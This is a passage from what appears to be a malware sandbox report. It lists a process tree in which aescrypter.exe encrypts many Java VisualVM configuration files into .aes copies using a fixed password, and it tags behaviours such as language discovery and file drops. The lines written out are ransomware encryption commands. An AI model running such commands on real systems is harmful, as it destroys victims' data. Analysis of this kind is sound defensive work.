  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-nodes.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-nodes.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1572
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2868
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-util.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-util.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2876
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3044
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-progress.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-progress.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3048
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-search.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-search.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2804
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-visual.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-visual.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2732
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-execution.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-execution.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2760
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-io-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-io-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3056
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multitabs.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multitabs.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2656
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1888
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1960
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1548
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-windows.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-windows.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1108
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1672
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2796
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-applemenu.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-applemenu.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1444
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-cli.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-cli.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2676
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1984
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1536
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-core-kit.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-core-kit.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1728
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2156
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:276
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-favorites.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-favorites.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1624
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-javahelp.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-javahelp.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1244
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-fallback.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-fallback.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2464
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-impl.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-impl.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3020
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2152
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1920
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2280
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:772
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-keymap.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-keymap.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1204
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2704
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-progress-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-progress-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1568
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1992
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:668
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:684
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-settings.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-settings.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2468
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-spi-actions.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-spi-actions.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2356
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-uihandler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-uihandler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1724
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-spi-quicksearch.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-spi-quicksearch.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2492
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-outline.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-outline.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1804
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-plaf.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-plaf.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2064
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1932
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-actions.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-actions.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1716
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-awt.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-awt.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2692
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2308
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2964
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-execution.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-execution.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2712
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-explorer.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-explorer.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2860
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2104
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-loaders.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-loaders.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2616
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-nodes.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-nodes.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3008
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-options.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-options.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2620
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-text.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-text.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2608
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1312
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1928
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2744
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-progress.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-progress.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:776
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2812
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2816
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2840
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-execution.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-execution.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2932
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-io-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-io-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2984
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2512
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1972
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-output2.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-output2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1988
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-startup.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-startup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1176
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2460
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-windows.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-windows.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2272
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1760
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
